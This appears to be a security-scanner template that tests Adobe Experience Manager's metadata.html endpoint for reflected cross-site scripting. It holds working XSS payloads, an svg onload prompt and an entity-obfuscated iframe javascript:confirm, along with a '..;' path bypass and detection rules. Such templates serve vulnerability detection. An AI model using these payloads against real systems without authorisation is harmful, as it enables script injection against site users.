id: aem-meta-xss
info:
  name: AEM Metadata XSS Generic
  risk: Medium

params:
  - root: '{{.BaseURL}}'

requests:
  # probe
  - method: GET
    redirect: false
    url: >-
     {{.root}}/libs/dam/merge/metadata.html?path=sample1%3E&.ico
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "sample1") && StringSearch("response", '{"assetPaths"') && StringSearch("resHeaders", "text/html")

  # probe 2
  - method: GET
    redirect: false
    url: >-
     {{.root}}/content/..;/libs/dam/merge/metadata.html?path=sample1%3E&.ico
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "sample1") && StringSearch("response", '{"assetPaths"') && StringSearch("resHeaders", "text/html")

  # verify
  - method: GET
    redirect: false
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    url: >-
     {{.root}}/libs/dam/merge/metadata.html?path=<svg/onload=prompt(1)>&.ico
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "onload=prompt(") && StringSearch("response", '{"assetPaths"') && StringSearch("resHeaders", "text/html")

  - method: GET
    redirect: false
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    url: >-
     {{.root}}/libs/dam/merge/metadata.html?path=%3Ciframe/srcdoc%3d%26lt%3biframe/%26%23x000000000000000000000000000000073%3brc%3djav%26%23x000000000000000000000000000000061;script%3aconfirm%26%23x000000000000000000000000000000028origin%26%23x000000000000000000000000000000029%26gt%3b%3E&.ico
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "iframe/srcdoc=&lt;iframe/&#x000000000000000000000000000000073;rc=jav&#x000000000000000000000000000000061;script:confirm&#x000000000000000000000000000000028origin&#x000000000000000000000000000000029&gt;") && StringSearch("response", '{"assetPaths"') && StringSearch("resHeaders", "text/html")